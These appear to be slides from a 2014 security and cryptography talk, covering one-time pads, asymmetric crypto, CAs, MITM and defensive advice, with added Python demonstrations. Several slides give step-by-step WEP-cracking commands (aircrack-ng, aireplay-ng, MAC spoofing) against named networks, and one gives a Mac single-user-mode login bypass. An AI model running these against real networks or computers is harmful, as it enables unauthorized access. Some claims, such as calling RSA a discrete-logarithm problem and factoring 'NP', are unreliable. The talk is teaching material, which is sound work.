ISC. 10 October George Wong

ISC 10 October 2014 George Wong

Sn vs Al
Tin was first replaced by aluminum starting in 1910. In the late 19th century and early 20th century, tin foil was in common use, and some people continue to refer to the new product by the name of the old one. It tends to give a slight tin taste, which is a major reason it has largely been replaced by aluminium and other materials.

Difference? Aluminum Tin
- The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency.
- f > 100 MHz: E_atten > 80 dB.
- Aluminum foil is very effective at attenuating low-frequency magnetic fields.
- A thickness of ~10 sheets offers less than 1 dB of shielding at 1 kHz, ~8 dB at 10 kHz, ~25 dB at 100 kHz.

Don't Trust Anyone!
or
You have to trust someone.

PERFECT SECURITY
- What does it mean?
- What does that mean?
- Can we achieve it?

YES: One-Time Pad (OTP)
- Bit-wise XOR with randomly generated key.
- Key must be same length as message
- Key cannot be reused
- Not practical!
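
The one-time pad rules on this slide, as an added Python example that is not part of the original slides. It shows why a single ciphertext reveals nothing (any same-length plaintext has a matching key) and why reusing the pad breaks that guarantee. The messages and function names are constructed for illustration.

```python
import secrets


def otp_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt: XOR is its own inverse, so one function does both."""
    if len(key) != len(data):
        raise ValueError("pad must be exactly as long as the message")
    return bytes(d ^ k for d, k in zip(data, key))


def key_that_explains(ciphertext: bytes, claimed_plaintext: bytes) -> bytes:
    """Perfect secrecy: every same-length plaintext is consistent with the
    ciphertext under some key, so the ciphertext alone rules nothing out."""
    return otp_xor(ciphertext, claimed_plaintext)


def reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """If one pad encrypted both messages, the pad cancels: c1 ^ c2 == m1 ^ m2."""
    return otp_xor(c1, c2)


# Constructed sample messages (equal length so one pad fits both).
M1 = b"MEET AT NOON"
M2 = b"STAY AT HOME"


def demo() -> dict:
    pad = secrets.token_bytes(len(M1))   # fresh random pad, same length as message
    c1 = otp_xor(M1, pad)
    c2 = otp_xor(M2, pad)                # the mistake: the same pad used again
    leak = reuse_leak(c1, c2)
    alt_key = key_that_explains(c1, b"FLEE AT DAWN")
    return {
        "round_trip": otp_xor(c1, pad) == M1,
        # An observer who knows or guesses M1 reads M2 without ever seeing the pad.
        "m2_from_known_m1": otp_xor(leak, M1),
        # With only one ciphertext, any 12-byte message has a key that fits it.
        "alt_key_decrypts_to": otp_xor(c1, alt_key),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```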

Computational Security
- Function of security parameter (key length)
- Security increases with time.
In practice:
- No need to exchange keys
- Computationally easy to perform
- Computationally hard to break

Basics of Asymmetric Cryptography
1. YOU: Create PRIV-PUB key pair, publish PUB key
2. External Party: Get PUB key
3. External Party: Encrypt message with PUB and send ciphertext
4. YOU: Decrypt ciphertext with PRIV

Basis for Asymmetric Cryptography
- One-way functions must exist: easy to compute, hard (impossible?) to invert
- Sample methodologies (Cyclic Groups):
  - Discrete Logarithm
  - Elliptic Curve

Cyclic Group
- Set of elements with element(s) that generate(s) the others
- Given an element, hard to find the exponent!
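
The cyclic-group idea on this slide, as an added Python example that is not part of the original slides. It uses the multiplicative group of integers modulo a small prime, finds the elements that generate the whole group, and contrasts the fast forward direction (modular exponentiation) with a brute-force search for the exponent whose cost grows with the group size. The primes and function names are chosen for illustration; real systems use groups far too large for this search.

```python
def element_order(g: int, p: int) -> int:
    """Smallest k >= 1 with g**k == 1 (mod p), for prime p and 0 < g < p."""
    x, k = g % p, 1
    while x != 1:
        x = x * g % p
        k += 1
    return k


def generators(p: int) -> list:
    """Elements whose powers reach every one of the p - 1 group elements."""
    return [g for g in range(1, p) if element_order(g, p) == p - 1]


def first_generator(p: int) -> int:
    """Smallest generator, found without enumerating all of them."""
    return next(g for g in range(2, p) if element_order(g, p) == p - 1)


def discrete_log(g: int, h: int, p: int) -> int:
    """Brute-force the exponent a with g**a == h (mod p).
    The number of multiplications performed equals the returned exponent."""
    x = 1
    for a in range(p - 1):
        if x == h:
            return a
        x = x * g % p
    raise ValueError("h is not a power of g modulo p")


def work_table(primes=(23, 1009, 10007)) -> list:
    """For each prime: (p, generator, exponent recovered by brute force).
    The secret exponent p - 2 is the worst case for the linear search."""
    rows = []
    for p in primes:
        g = first_generator(p)
        secret = p - 2
        h = pow(g, secret, p)          # forward direction: fast square-and-multiply
        rows.append((p, g, discrete_log(g, h, p)))
    return rows


if __name__ == "__main__":
    print("generators mod 23:", generators(23))
    for p, g, steps in work_table():
        print(f"p={p} g={g} brute-force multiplications={steps}")
```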

Discrete Logarithm (RSA)
Given n, e, and b, find a.
Breaking this requires:
- Brute force
- Factoring n, a (very) large number (NP)

Elliptic Curve

Hardcore Attack Strategy
- Find security flaw
- Spoof
- Probe
- Brute-force
- Differential Cryptanalysis
- Exploit (Escalate Privileges)
- Drop Payload
- Housekeeping

Worst Danger of Cryptography
Ceiling Tiles!

Random Numbers
- Linear Congruence Generator
- Mersenne Twister
- Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG)
- NSA

In Practice
- Social Engineering
- Asking / looking over the shoulder
- Post-it notes
- Piggybacking / Tailgating
- Phishing
- Keyloggers
- Cracking (vs Hacking!)
- Known Exploits (e.g. Heartbleed)
- Metasploit
- Kali Linux (i.e. BackTrack 6)

Certificate Authority (CA)
- Phonebook, do you trust the distributor?
- How do you get the public key?
- VeriSign, Digi-Sign, et al.
- Limits liability to $100

MITM: Man In The Middle
- You have to send your data at some point
- Ettercap, ARP Spoofing and Promiscuous mode
[Diagram: Alice, Bob, Eve]

Cracked Files
- If a computer can run a file, you can read it and you can modify it!
- Assembly: list of instructions
- Code injection
- Validation has to happen somewhere

Cracked Files
... so rewrite the code to skip validation!

WEP (Wired Equivalent Privacy)
IV attack
$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger --mac 00:11:22:33:44:55 wlan0
$ airmon-ng start wlan
$ airodump-ng wlan0
$ airodump-ng -c 1 -w myfile --bssid 00:16:B6:C4:66:46 wlan0
$ aireplay-ng -1 0 -a 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 -e PeteNetLive wlan0
$ aireplay-ng -3 -b 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 wlan0
$ aircrack-ng -b 00:16:B6:B4:66:46 myfile-01.cap

WEP (Wired Equivalent Privacy)
$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger --mac 00:11:22:33:44:55 wlan0
$ airmon-ng start wlan
$ airodump-ng wlan0
$ airodump-ng -c 1 -w myfile --bssid 01:3E:04:C1:E0:92 wlan0
$ aireplay-ng -1 0 -a 01:3E:04:C1:E0:92 -h 00:11:22:33:44:55 -e Karabraxos wlan0
$ aireplay-ng -3 -b 01:3E:04:C1:E0:92 -h 00:11:22:33:44:55 wlan0

WEP (Wired Equivalent Privacy)
$ aircrack-ng -b 01:3E:04:C1:E0:92 myfile-01.cap

WEP (Wired Equivalent Privacy)
$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger --mac 00:11:22:33:44:55 wlan0
$ airmon-ng start wlan
$ airodump-ng wlan0
$ airodump-ng -c 1 -w myfile --bssid 00:16:B6:C4:66:46 wlan0
$ aireplay-ng -1 0 -a 01:3E:04:C1:E0:92 -h 00:11:22:33:44:55 -e Karabraxos wlan0
$ aireplay-ng -3 -b 01:3E:04:C1:E0:92 -h 00:11:22:33:44:55 wlan0
$ aircrack-ng -b 01:3E:04:C1:E0:92 myfile-01.cap

Windows
OphCrack, Cain & Abel, Kon-Boot

Single User mode
Notoriously easy to break into
Mac OSX
Tools: S Headphones
$ /sbin/mount -wu /
$ rm /var/db/.applesetupdone

How to avoid the above:
- Make yourself a bad target
- Use encryption
- Update your system
- Don't publicize the worth of your information

The rules about keeping your information safe:
1. Your information is not safe.
2. Don't assume you can keep your information safe.
3. If someone tells you your information is safe, see Rule 1. It applies twice now.

THANK YOU!